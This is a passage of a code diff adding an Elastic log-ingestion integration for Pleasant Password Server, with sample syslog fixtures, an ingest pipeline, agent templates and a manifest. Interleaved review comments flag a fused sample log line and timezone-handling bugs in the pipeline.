Server:192.168.1.1 - user@name.test - - Success - Session Log On - User logged on 127.0.0.1 23/01 12:37:37.346 +<134>Jan 23 12:38:07 SRV-PPS-001 Pleasant Password Server:192.168.1.1 - user@name.test - - Success - Entry Updated - User updated entry changing the password 127.0.0.1 23/01 12:38:07.629 +<134>Jan 23 13:43:47 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Identity Verified 
- User verified via ApplicationBasicOAuth 127.0.0.1 23/01 13:43:47.422 +<134>Jan 23 13:47:25 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Error - Identity Not Verified - User failed to verify themselves 127.0.0.1 23/01 13:47:25.593 +<134>Jan 23 13:47:25 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Error - Sign-in Failed - User sign-in denied 127.0.0.1 23/01 13:47:25.641 +<134>Jan 23 14:05:54 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Entry Created - User created entry as a duplicate 127.0.0.1 23/01 14:05:54.404 +<134>Jan 23 14:05:54 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Entry Duplicated - User duplicated entry 127.0.0.1 23/01 14:05:54.450 +``` + +## Logs + +This is the `log` dataset. + +{{event "log"}} + +{{fields "log"}} diff --git a/packages/pps/_dev/deploy/docker/docker-compose.yml b/packages/pps/_dev/deploy/docker/docker-compose.yml new file mode 100644 index 00000000000..2fe2cada4f9 --- /dev/null +++ b/packages/pps/_dev/deploy/docker/docker-compose.yml @@ -0,0 +1,18 @@ +version: '2.3' +services: + pps-log-logfile: + image: alpine + volumes: + - ./sample_logs:/sample_logs:ro + - ${SERVICE_LOGS_DIR}:/var/log + command: /bin/sh -c "cp /sample_logs/* /var/log/" + pps-log-tcp: + image: docker.elastic.co/observability/stream:v0.15.0 + volumes: + - ./sample_logs:/sample_logs:ro + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9037 -p=tcp /sample_logs/log.log + pps-log-udp: + image: docker.elastic.co/observability/stream:v0.15.0 + volumes: + - ./sample_logs:/sample_logs:ro + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9038 -p=udp /sample_logs/log.log diff --git a/packages/pps/_dev/deploy/docker/sample_logs/log.log b/packages/pps/_dev/deploy/docker/sample_logs/log.log new file mode 100644 index 00000000000..1be8b1a3a2a --- /dev/null +++ b/packages/pps/_dev/deploy/docker/sample_logs/log.log 
@@ -0,0 +1,10 @@ +<134>Jan 23 09:49:10 SRV-PPS-001 Pleasant Password Server:192.168.1.2 - user@name.test - - Success - Syslog Settings Changed - User Syslogging setting updated changing the host from to <127.0.0.1> changing the port fr 127.0.0.1 23/01 09:49:10.894 +<134>Jan 23 11:32:57 SRV-PPS-001 Pleasant Password Server:192.168.1.2 - user@name.test - - Success - Password Fetched - User fetched the password for - test 127.0.0.1 23/01 11:32:57.857 +<134>Jan 23 12:20:07 SRV-PPS-001 Pleasant Password Server:0.0.0.0 - Backup Restore Service - - Success - Backup Occurred - User backing up database to Jan 23 12:37:37 SRV-PPS-001 Pleasant Password Server:192.168.1.1 - user@name.test - - Success - Session Log On - User logged on 127.0.0.1 23/01 12:37:37.346 +<134>Jan 23 12:38:07 SRV-PPS-001 Pleasant Password Server:192.168.1.1 - user@name.test - - Success - Entry Updated - User updated entry changing the password 127.0.0.1 23/01 12:38:07.629 +<134>Jan 23 13:43:47 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Identity Verified - User verified via ApplicationBasicOAuth 127.0.0.1 23/01 13:43:47.422 +<134>Jan 23 13:47:25 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Error - Identity Not Verified - User failed to verify themselves 127.0.0.1 23/01 13:47:25.593 +<134>Jan 23 13:47:25 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Error - Sign-in Failed - User sign-in denied 127.0.0.1 23/01 13:47:25.641 +<134>Jan 23 14:05:54 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Entry Created - User created entry as a duplicate 127.0.0.1 23/01 14:05:54.404 +<134>Jan 23 14:05:54 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Entry Duplicated - User duplicated entry 127.0.0.1 23/01 14:05:54.450 diff --git a/packages/pps/changelog.yml b/packages/pps/changelog.yml new file mode 100644 index 00000000000..375181b767a --- /dev/null 
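Review bot: The third sample line fuses two records: it begins as the 12:20:07 `Backup Occurred` event from `0.0.0.0` and, with no line break and no `<134>` prefix, continues with the 12:37:37 `Session Log On` event from `192.168.1.1`. The same fused line is repeated in `test-log.log` and in `test-log.log-expected.json`, where the expected document for it takes `@timestamp` and `client.ip` from the first fragment but `message` from the second, so the fixture locks in a mis-parsed event instead of exercising the pipeline on two valid ones. The hunk header announces 10 lines while only nine records are distinguishable in this view, so the break may also have been lost upstream; either way the fixture should be split into two complete lines (or the truncated one dropped) and the expected output regenerated. The `hit_count: 10` assertions in the system test configs should then be rechecked against the corrected line count.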
+++ b/packages/pps/changelog.yml
@@ -0,0 +1,6 @@
+# newer versions go on top
+- version: "0.0.1"
+ changes:
+ - description: Initial Integration for Pleasant Password Server in Elastic
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/8951
diff --git a/packages/pps/data_stream/log/_dev/test/pipeline/test-common-config.yml b/packages/pps/data_stream/log/_dev/test/pipeline/test-common-config.yml
new file mode 100644
index 00000000000..4da22641654
--- /dev/null
+++ b/packages/pps/data_stream/log/_dev/test/pipeline/test-common-config.yml
@@ -0,0 +1,3 @@
+fields:
+ tags:
+ - preserve_original_event
diff --git a/packages/pps/data_stream/log/_dev/test/pipeline/test-log.log b/packages/pps/data_stream/log/_dev/test/pipeline/test-log.log
new file mode 100644
index 00000000000..a0bb3c706ef
--- /dev/null
+++ b/packages/pps/data_stream/log/_dev/test/pipeline/test-log.log
@@ -0,0 +1,10 @@ +<134>Jan 23 09:49:10 SRV-PPS-001 Pleasant Password Server:192.168.1.2 - user@name.test - - Success - Syslog Settings Changed - User Syslogging setting updated changing the host from to <127.0.0.1> changing the port fr 127.0.0.1 23/01 09:49:10.894 +<134>Jan 23 11:32:57 SRV-PPS-001 Pleasant Password Server:192.168.1.2 - user@name.test - - Success - Password Fetched - User fetched the password for - test 127.0.0.1 23/01 11:32:57.857 +<134>Jan 23 12:20:07 SRV-PPS-001 Pleasant Password Server:0.0.0.0 - Backup Restore Service - - Success - Backup Occurred - User backing up database to Jan 23 12:37:37 SRV-PPS-001 Pleasant Password Server:192.168.1.1 - user@name.test - - Success - Session Log On - User logged on 127.0.0.1 23/01 12:37:37.346 +<134>Jan 23 12:38:07 SRV-PPS-001 Pleasant Password Server:192.168.1.1 - user@name.test - - Success - Entry Updated - User updated entry changing the password 127.0.0.1 23/01 12:38:07.629 +<134>Jan 23 13:43:47 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Identity Verified - User verified via ApplicationBasicOAuth 127.0.0.1 23/01 13:43:47.422 +<134>Jan 23 13:47:25 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Error - Identity Not Verified - User failed to verify themselves 127.0.0.1 23/01 13:47:25.593 +<134>Jan 23 13:47:25 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Error - Sign-in Failed - User sign-in denied 127.0.0.1 23/01 13:47:25.641 +<134>Jan 23 14:05:54 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Entry Created - User created entry as a duplicate 127.0.0.1 23/01 14:05:54.404 +<134>Jan 23 14:05:54 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Entry Duplicated - User duplicated entry 127.0.0.1 23/01 14:05:54.450 \ No newline at end of file 
diff --git a/packages/pps/data_stream/log/_dev/test/pipeline/test-log.log-expected.json b/packages/pps/data_stream/log/_dev/test/pipeline/test-log.log-expected.json
new file mode 100644
index 00000000000..dc77b3e82d4
--- /dev/null
+++ b/packages/pps/data_stream/log/_dev/test/pipeline/test-log.log-expected.json
@@ -0,0 +1,309 @@ +{ + "expected": [ + { + "@timestamp": "2024-01-23T09:49:10.000Z", + "client": { + "ip": "192.168.1.2" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "created": "2024-01-23T09:49:10.000Z", + "original": "<134>Jan 23 09:49:10 SRV-PPS-001 Pleasant Password Server:192.168.1.2 - user@name.test - - Success - Syslog Settings Changed - User Syslogging setting updated changing the host from to <127.0.0.1> changing the port fr\t127.0.0.1\t23/01 09:49:10.894\t", + "outcome": "success" + }, + "host": { + "hostname": "SRV-PPS-001" + }, + "log": { + "syslog": { + "priority": 134 + } + }, + "message": "Syslog Settings Changed - User Syslogging setting updated changing the host from to <127.0.0.1> changing the port fr\t127.0.0.1\t23/01 09:49:10.894\t", + "tags": [ + "preserve_original_event" + ], + "user": { + "domain": "name.test", + "email": "user@name.test", + "name": "user" + } + }, + { + "@timestamp": "2024-01-23T11:32:57.000Z", + "client": { + "ip": "192.168.1.2" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "created": "2024-01-23T11:32:57.000Z", + "original": "<134>Jan 23 11:32:57 SRV-PPS-001 Pleasant Password Server:192.168.1.2 - user@name.test - - Success - Password Fetched - User fetched the password for - test\t127.0.0.1\t23/01 11:32:57.857\t", + "outcome": "success" + }, + "host": { + "hostname": "SRV-PPS-001" + }, + "log": { + "syslog": { + "priority": 134 + } + }, + "message": "Password Fetched - User fetched the password for - test\t127.0.0.1\t23/01 11:32:57.857\t", + "tags": [ + "preserve_original_event" + ], + "user": { + "domain": "name.test", + "email": "user@name.test", + "name": "user" + } + }, + { + "@timestamp": "2024-01-23T12:20:07.000Z", + "client": { + "ip": "0.0.0.0" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "created": "2024-01-23T12:20:07.000Z", + "original": "<134>Jan 23 12:20:07 SRV-PPS-001 Pleasant Password Server:0.0.0.0 - Backup Restore Service - - Success - Backup Occurred - User backing up 
database to backing up database to Jan 23 12:37:37 SRV-PPS-001 Pleasant Password Server:192.168.1.1 - user@name.test - - Success - Session Log On - User logged on\t127.0.0.1\t23/01 12:37:37.346", + "outcome": "success" + }, + "host": { + "hostname": "SRV-PPS-001" + }, + "log": { + "syslog": { + "priority": 134 + } + }, + "message": "Session Log On - User logged on\t127.0.0.1\t23/01 12:37:37.346", + "tags": [ + "preserve_original_event" + ], + "user": { + "domain": "name.test", + "email": "user@name.test", + "name": "user" + } + }, + { + "@timestamp": "2024-01-23T12:38:07.000Z", + "client": { + "ip": "192.168.1.1" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "created": "2024-01-23T12:38:07.000Z", + "original": "<134>Jan 23 12:38:07 SRV-PPS-001 Pleasant Password Server:192.168.1.1 - user@name.test - - Success - Entry Updated - User updated entry changing the password\t127.0.0.1\t23/01 12:38:07.629\t", + "outcome": "success" + }, + "host": { + "hostname": "SRV-PPS-001" + }, + "log": { + "syslog": { + "priority": 134 + } + }, + "message": "Entry Updated - User updated entry changing the password\t127.0.0.1\t23/01 12:38:07.629\t", + "tags": [ + "preserve_original_event" + ], + "user": { + "domain": "name.test", + "email": "user@name.test", + "name": "user" + } + }, + { + "@timestamp": "2024-01-23T13:43:47.000Z", + "client": { + "ip": "192.168.1.3" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "created": "2024-01-23T13:43:47.000Z", + "original": "<134>Jan 23 13:43:47 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Identity Verified - User verified via ApplicationBasicOAuth\t127.0.0.1\t23/01 13:43:47.422\t", + "outcome": "success" + }, + "host": { + "hostname": "SRV-PPS-001" + }, + "log": { + "syslog": { + "priority": 134 + } + }, + "message": "Identity Verified - User verified via ApplicationBasicOAuth\t127.0.0.1\t23/01 13:43:47.422\t", + "tags": [ + "preserve_original_event" + ], + "user": { + "domain": 
"name.test", + "email": "user@name.test", + "name": "user" + } + }, + { + "@timestamp": "2024-01-23T13:47:25.000Z", + "client": { + "ip": "192.168.1.3" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "created": "2024-01-23T13:47:25.000Z", + "original": "<134>Jan 23 13:47:25 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Error - Identity Not Verified - User failed to verify themselves\t127.0.0.1\t23/01 13:47:25.593\t", + "outcome": "failure" + }, + "host": { + "hostname": "SRV-PPS-001" + }, + "log": { + "syslog": { + "priority": 134 + } + }, + "message": "Identity Not Verified - User failed to verify themselves\t127.0.0.1\t23/01 13:47:25.593\t", + "tags": [ + "preserve_original_event" + ], + "user": { + "domain": "name.test", + "email": "user@name.test", + "name": "user" + } + }, + { + "@timestamp": "2024-01-23T13:47:25.000Z", + "client": { + "ip": "192.168.1.3" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "created": "2024-01-23T13:47:25.000Z", + "original": "<134>Jan 23 13:47:25 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Error - Sign-in Failed - User sign-in denied\t127.0.0.1\t23/01 13:47:25.641\t", + "outcome": "failure" + }, + "host": { + "hostname": "SRV-PPS-001" + }, + "log": { + "syslog": { + "priority": 134 + } + }, + "message": "Sign-in Failed - User sign-in denied\t127.0.0.1\t23/01 13:47:25.641\t", + "tags": [ + "preserve_original_event" + ], + "user": { + "domain": "name.test", + "email": "user@name.test", + "name": "user" + } + }, + { + "@timestamp": "2024-01-23T14:05:54.000Z", + "client": { + "ip": "192.168.1.3" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "created": "2024-01-23T14:05:54.000Z", + "original": "<134>Jan 23 14:05:54 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Entry Created - User created entry as a duplicate\t127.0.0.1\t23/01 14:05:54.404\t", + "outcome": "success" + }, + "host": { + "hostname": "SRV-PPS-001" + }, + 
"log": { + "syslog": { + "priority": 134 + } + }, + "message": "Entry Created - User created entry as a duplicate\t127.0.0.1\t23/01 14:05:54.404\t", + "tags": [ + "preserve_original_event" + ], + "user": { + "domain": "name.test", + "email": "user@name.test", + "name": "user" + } + }, + { + "@timestamp": "2024-01-23T14:05:54.000Z", + "client": { + "ip": "192.168.1.3" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "created": "2024-01-23T14:05:54.000Z", + "original": "<134>Jan 23 14:05:54 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Entry Duplicated - User duplicated entry \t127.0.0.1\t23/01 14:05:54.450\t", + "outcome": "success" + }, + "host": { + "hostname": "SRV-PPS-001" + }, + "log": { + "syslog": { + "priority": 134 + } + }, + "message": "Entry Duplicated - User duplicated entry \t127.0.0.1\t23/01 14:05:54.450\t", + "tags": [ + "preserve_original_event" + ], + "user": { + "domain": "name.test", + "email": "user@name.test", + "name": "user" + } + } + ] +} \ No newline at end of file diff --git a/packages/pps/data_stream/log/_dev/test/system/test-logfile-config.yml b/packages/pps/data_stream/log/_dev/test/system/test-logfile-config.yml new file mode 100644 index 00000000000..3f93edd54e6 --- /dev/null +++ b/packages/pps/data_stream/log/_dev/test/system/test-logfile-config.yml @@ -0,0 +1,10 @@ +service: pps-log-logfile +input: logfile +vars: + paths: + - "{{SERVICE_LOGS_DIR}}/*.log" +data_stream: + vars: + preserve_original_event: true +assert: + hit_count: 10 diff --git a/packages/pps/data_stream/log/_dev/test/system/test-tcp-config.yml b/packages/pps/data_stream/log/_dev/test/system/test-tcp-config.yml new file mode 100644 index 00000000000..6967de26d33 --- /dev/null +++ b/packages/pps/data_stream/log/_dev/test/system/test-tcp-config.yml 
@@ -0,0 +1,11 @@
+service: pps-log-tcp
+service_notify_signal: SIGHUP
+input: tcp
+vars:
+ listen_address: 0.0.0.0
+data_stream:
+ vars:
+ listen_port: 9037
+ preserve_original_event: true
+assert:
+ hit_count: 10
diff --git a/packages/pps/data_stream/log/_dev/test/system/test-udp-config.yml b/packages/pps/data_stream/log/_dev/test/system/test-udp-config.yml
new file mode 100644
index 00000000000..f392d0d168c
--- /dev/null
+++ b/packages/pps/data_stream/log/_dev/test/system/test-udp-config.yml
@@ -0,0 +1,11 @@
+service: pps-log-udp
+service_notify_signal: SIGHUP
+input: udp
+vars:
+ listen_address: 0.0.0.0
+data_stream:
+ vars:
+ listen_port: 9038
+ preserve_original_event: true
+assert:
+ hit_count: 10
diff --git a/packages/pps/data_stream/log/_dev/test/system/test-udp-tz-config.yml b/packages/pps/data_stream/log/_dev/test/system/test-udp-tz-config.yml
new file mode 100644
index 00000000000..e9de3d73845
--- /dev/null
+++ b/packages/pps/data_stream/log/_dev/test/system/test-udp-tz-config.yml
@@ -0,0 +1,12 @@
+service: pps-log-udp
+service_notify_signal: SIGHUP
+input: udp
+vars:
+ listen_address: 0.0.0.0
+data_stream:
+ vars:
+ listen_port: 9038
+ preserve_original_event: true
+ tz_offset: "+0500"
+assert:
+ hit_count: 10
diff --git a/packages/pps/data_stream/log/agent/stream/log.yml.hbs b/packages/pps/data_stream/log/agent/stream/log.yml.hbs
new file mode 100644
index 00000000000..ef78b8fab52
--- /dev/null
+++ b/packages/pps/data_stream/log/agent/stream/log.yml.hbs
@@ -0,0 +1,26 @@
+paths:
+{{#each paths as |path|}}
+ - {{path}}
+{{/each}}
+exclude_files: ['\.gz$']
+tags:
+{{#if preserve_original_event}}
+ - preserve_original_event
+{{/if}}
+{{#each tags as |tag|}}
+ - {{tag}}
+{{/each}}
+{{#contains "forwarded" tags}}
+publisher_pipeline.disable_host: true
+{{/contains}}
+{{#if tz_offset}}
+fields_under_root: true
+fields:
+ _conf:
+ tz_offset: "{{tz_offset}}"
+{{/if}}
+processors:
+- add_locale: ~
+{{#if processors}}
+{{processors}}
+{{/if}}
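Review bot: `- add_locale: ~` is emitted unconditionally in this logfile template but is absent from tcp.yml.hbs and udp.yml.hbs, so the same syslog line gets a different timestamp depending on the input: with the default `tz_offset: local`, logfile events arrive with `event.timezone` populated by add_locale (the agent host's UTC offset) and the pipeline's first date processor parses in that zone, while TCP/UDP events carry no `event.timezone` and fall through to the second date processor, which parses them as UTC. Either emit `- add_locale: ~` in the TCP/UDP templates as well, or state in the `tz_offset` description that `local` means the agent's zone only for file collection. A logfile system test that sets `tz_offset` would also make the interaction between add_locale and the pipeline's `_conf.tz_offset` handling visible; at present only the UDP test sets it.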
diff --git a/packages/pps/data_stream/log/agent/stream/tcp.yml.hbs b/packages/pps/data_stream/log/agent/stream/tcp.yml.hbs
new file mode 100644
index 00000000000..e0d65510297
--- /dev/null
+++ b/packages/pps/data_stream/log/agent/stream/tcp.yml.hbs
@@ -0,0 +1,24 @@
+host: "{{listen_address}}:{{listen_port}}"
+tags:
+{{#if preserve_original_event}}
+ - preserve_original_event
+{{/if}}
+{{#each tags as |tag|}}
+ - {{tag}}
+{{/each}}
+{{#contains "forwarded" tags}}
+publisher_pipeline.disable_host: true
+{{/contains}}
+{{#if ssl}}
+ssl: {{ssl}}
+{{/if}}
+{{#if tz_offset}}
+fields_under_root: true
+fields:
+ _conf:
+ tz_offset: "{{tz_offset}}"
+{{/if}}
+{{#if processors}}
+processors:
+{{processors}}
+{{/if}}
diff --git a/packages/pps/data_stream/log/agent/stream/udp.yml.hbs b/packages/pps/data_stream/log/agent/stream/udp.yml.hbs
new file mode 100644
index 00000000000..4fdea17c509
--- /dev/null
+++ b/packages/pps/data_stream/log/agent/stream/udp.yml.hbs
@@ -0,0 +1,24 @@
+host: "{{listen_address}}:{{listen_port}}"
+{{#if udp_options}}
+{{udp_options}}
+{{/if}}
+tags:
+{{#if preserve_original_event}}
+ - preserve_original_event
+{{/if}}
+{{#each tags as |tag|}}
+ - {{tag}}
+{{/each}}
+{{#contains "forwarded" tags}}
+publisher_pipeline.disable_host: true
+{{/contains}}
+{{#if tz_offset}}
+fields_under_root: true
+fields:
+ _conf:
+ tz_offset: "{{tz_offset}}"
+{{/if}}
+{{#if processors}}
+processors:
+{{processors}}
+{{/if}}
diff --git a/packages/pps/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/pps/data_stream/log/elasticsearch/ingest_pipeline/default.yml
new file mode 100644
index 00000000000..8a6e9d63c9a
--- /dev/null
+++ b/packages/pps/data_stream/log/elasticsearch/ingest_pipeline/default.yml
@@ -0,0 +1,92 @@
+---
+description: Pipeline for processing Pleasant Password Server logs.
+processors:
+ - rename:
+ field: message
+ target_field: event.original
+ ignore_missing: true
+ if: ctx.event?.original == null
+ - set:
+ field: ecs.version
+ value: "8.11.0"
+ - grok:
+ field: event.original
+ patterns:
+ - '^<%{NUMBER:log.syslog.priority:long}>%{SYSLOGTIMESTAMP:event.created}\s+%{NOTSPACE:host.hostname}\s%{DATA}:%{IP:client.ip}\s-\s%{USERNAME:user.name}@%{DATA:user.domain}\s%{DATA}(?(Success)|(Error))\s-\s%{GREEDYDATA:message}'
+ - '^<%{NUMBER:log.syslog.priority:long}>%{SYSLOGTIMESTAMP:event.created}\s+%{NOTSPACE:host.domain}\s%{DATA}:%{IP:client.ip}%{DATA}(?(Success)|(Error))\s-\s%{GREEDYDATA:message}'
+ - '^%{GREEDYDATA:message}$'
+ # Set the Event Outcome to Lower Case to be ECS Compliant
+ - lowercase:
+ field: event.outcome
+ if: ctx.event?.outcome != null
+ # Set the Event Outcome to failure if the event.outcome is error
+ - set:
+ field: event.outcome
+ value: "failure"
+ if: ctx.event?.outcome == 'error'
+ # Set the Event Outcome to unknown if neither error nor success is present
+ - set:
+ field: event.outcome
+ value: "unknown"
+ if: ctx.event?.outcome != 'success' && ctx.event?.outcome != 'failure'
+ - rename:
+ field: _conf.tz_offset
+ target_field: event.timezone
+ if: ctx._conf?.tz_offset != null && ctx._conf.tz_offset != 'local'
+ ignore_missing: true
+ ignore_failure: true
+ - date:
+ field: event.created
+ target_field: "event.created"
+ formats:
+ - "MMM dd HH:mm:ss"
+ timezone: "{{{event.timezone}}}"
+ if: ctx.event?.timezone != null && ctx.event?.created != null
+ on_failure:
+ - remove:
+ field: event.created
+ ignore_missing: true
+ - append:
+ field: error.message
+ value: "{{{_ingest.on_failure_message}}}"
+ - date:
+ field: event.created
+ target_field: "event.created"
+ formats:
+ - "MMM dd HH:mm:ss"
+ if: ctx.event?.timezone == null && ctx.event?.created != null
+ on_failure:
+ - remove:
+ field: event.created
+ ignore_missing: true
+ - append:
+ field: error.message
+ value: "{{{_ingest.on_failure_message}}}"
+ # Since logstash sets the @timestamp if not present, `override: true` is required to overwrite the value with event timestamp.
+ - set:
+ field: "@timestamp"
+ value: "{{{event.created}}}"
+ if: "ctx.event?.created != null"
+ override: true
+ - set:
+ field: "user.email"
+ value: "{{{user.name}}}@{{{user.domain}}}"
+ if: ctx.user?.name != null && ctx.user?.domain != null
+ - remove:
+ field: event.original
+ if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))
+ ignore_failure: true
+ ignore_missing: true
+ - remove:
+ field:
+ - _conf
+ - _tmp
+ ignore_failure: true
+ ignore_missing: true
+on_failure:
+ - append:
+ field: error.message
+ value: "Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}"
+ - set:
+ field: event.kind
+ value: pipeline_error
diff --git a/packages/pps/data_stream/log/fields/agent.yml b/packages/pps/data_stream/log/fields/agent.yml
new file mode 100644
index 00000000000..a07e2ce0b2b
--- /dev/null
+++ b/packages/pps/data_stream/log/fields/agent.yml
@@ -0,0 +1,6 @@
+- name: input.type
+ type: keyword
+ description: Input type
+- name: log.offset
+ type: long
+ description: Log offset
diff --git a/packages/pps/data_stream/log/fields/base-fields.yml b/packages/pps/data_stream/log/fields/base-fields.yml
new file mode 100644
index 00000000000..9b0bfa08529
--- /dev/null
+++ b/packages/pps/data_stream/log/fields/base-fields.yml
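Review bot: The `rename` of `_conf.tz_offset` to `event.timezone` cannot take effect when `event.timezone` already exists (rename refuses to overwrite its target), and `ignore_failure: true` then hides the failure; for the logfile stream, whose template always runs `add_locale` and so always arrives with `event.timezone` set to the agent host's offset, a user-configured `tz_offset` is silently discarded and the first date processor keeps parsing in the agent's zone. The system tests do not exercise this, since only the UDP config sets `tz_offset`. Replacing the rename with a `set` that copies the value and overrides, as below, makes the configured offset win on every input. Separately, the second grok pattern stores the hostname token in `host.domain` while the first stores it in `host.hostname`, and neither field is declared in fields/agent.yml, base-fields.yml or ecs.yml even though sample_event.json shows `host.hostname`, so its mapping presumably relies on dynamic mapping rather than the ECS definition. Apart from `pipeline_error` on failure no `event.kind`, `event.category` or `event.type` is set, so sign-in and identity-verification outcomes are not surfaced as ECS authentication events for detection rules.
```yaml
  - set:
      field: event.timezone
      copy_from: _conf.tz_offset
      override: true
      if: ctx._conf?.tz_offset != null && ctx._conf.tz_offset != 'local'
# … unchanged: both date processors and the rest of the pipeline …
```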
@@ -0,0 +1,15 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: '@timestamp'
+ type: date
+ description: Event timestamp.
+- name: log.source.address
+ type: keyword
+ description: Log source address
diff --git a/packages/pps/data_stream/log/fields/ecs.yml b/packages/pps/data_stream/log/fields/ecs.yml
new file mode 100644
index 00000000000..e8b886726b1
--- /dev/null
+++ b/packages/pps/data_stream/log/fields/ecs.yml
@@ -0,0 +1,20 @@
+- external: ecs
+ name: user.name
+- external: ecs
+ name: user.domain
+- external: ecs
+ name: user.email
+- external: ecs
+ name: client.ip
+- external: ecs
+ name: ecs.version
+- external: ecs
+ name: log.syslog.priority
+- external: ecs
+ name: message
+- external: ecs
+ name: event.outcome
+- external: ecs
+ name: log.file.path
+- external: ecs
+ name: tags
diff --git a/packages/pps/data_stream/log/manifest.yml b/packages/pps/data_stream/log/manifest.yml
new file mode 100644
index 00000000000..eaf0a695381
--- /dev/null
+++ b/packages/pps/data_stream/log/manifest.yml
@@ -0,0 +1,131 @@
+title: Pleasant Password Server logs
+type: logs
+streams:
+ - input: logfile
+ title: Pleasant Password Server logs
+ description: Collect Pleasant Password Server logs via file input.
+ template_path: log.yml.hbs
+ vars:
+ - name: tags
+ type: text
+ title: Tags
+ multi: true
+ required: true
+ show_user: false
+ default:
+ - forwarded
+ - pps-log
+ - name: preserve_original_event
+ required: true
+ show_user: true
+ title: Preserve original event
+ description: Preserves a raw copy of the original event, added to the field `event.original`.
+ type: bool
+ multi: false
+ default: false
+ - name: tz_offset
+ type: text
+ title: Timezone Offset
+ multi: false
+ required: true
+ show_user: true
+ default: local
+ description: >-
+ By default, datetimes in the logs will be interpreted as relative to the timezone configured in the host where the agent is running. If ingesting logs from a host on a different timezone, use this field to set the timezone offset so that datetimes are correctly parsed. Acceptable timezone formats are: a canonical ID (e.g. "Europe/Amsterdam"), abbreviated (e.g. "EST") or an HH:mm differential (e.g. "-05:00") from UCT.
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
+ show_user: false
+ description: >-
+ Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.
+ - input: tcp
+ title: Pleasant Password Server logs
+ description: Collect Pleasant Password Server logs via TCP input.
+ template_path: tcp.yml.hbs
+ vars:
+ - name: tags
+ type: text
+ title: Tags
+ multi: true
+ required: true
+ show_user: false
+ default:
+ - forwarded
+ - pps-log
+ - name: preserve_original_event
+ required: true
+ show_user: true
+ title: Preserve original event
+ description: Preserves a raw copy of the original event, added to the field `event.original`.
+ type: bool
+ multi: false
+ default: false
+ - name: tz_offset
+ type: text
+ title: Timezone Offset
+ multi: false
+ required: true
+ show_user: true
+ default: local
+ description: >-
+ By default, datetimes in the logs will be interpreted as relative to the timezone configured in the host where the agent is running. If ingesting logs from a host on a different timezone, use this field to set the timezone offset so that datetimes are correctly parsed. Acceptable timezone formats are: a canonical ID (e.g. "Europe/Amsterdam"), abbreviated (e.g. "EST") or an HH:mm differential (e.g. "-05:00") from UCT.
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
+ show_user: false
+ description: >-
+ Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.
+ - input: udp
+ title: Pleasant Password Server logs
+ description: Collect Pleasant Password Server logs via UDP input.
+ template_path: udp.yml.hbs
+ vars:
+ - name: tags
+ type: text
+ title: Tags
+ multi: true
+ required: true
+ show_user: false
+ default:
+ - forwarded
+ - pps-log
+ - name: preserve_original_event
+ required: true
+ show_user: true
+ title: Preserve original event
+ description: Preserves a raw copy of the original event, added to the field `event.original`.
+ type: bool
+ multi: false
+ default: false
+ - name: tz_offset
+ type: text
+ title: Timezone Offset
+ multi: false
+ required: true
+ show_user: true
+ default: local
+ description: >-
+ By default, datetimes in the logs will be interpreted as relative to the timezone configured in the host where the agent is running. If ingesting logs from a host on a different timezone, use this field to set the timezone offset so that datetimes are correctly parsed. Acceptable timezone formats are: a canonical ID (e.g. "Europe/Amsterdam"), abbreviated (e.g. "EST") or an HH:mm differential (e.g. "-05:00") from UCT.
+ - name: udp_options
+ type: yaml
+ title: Custom UDP Options
+ multi: false
+ required: false
+ show_user: false
+ default: |
+ #read_buffer: 100MiB
+ #max_message_size: 50KiB
+ #timeout: 300s
+ description: Specify custom configuration options for the UDP input.
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
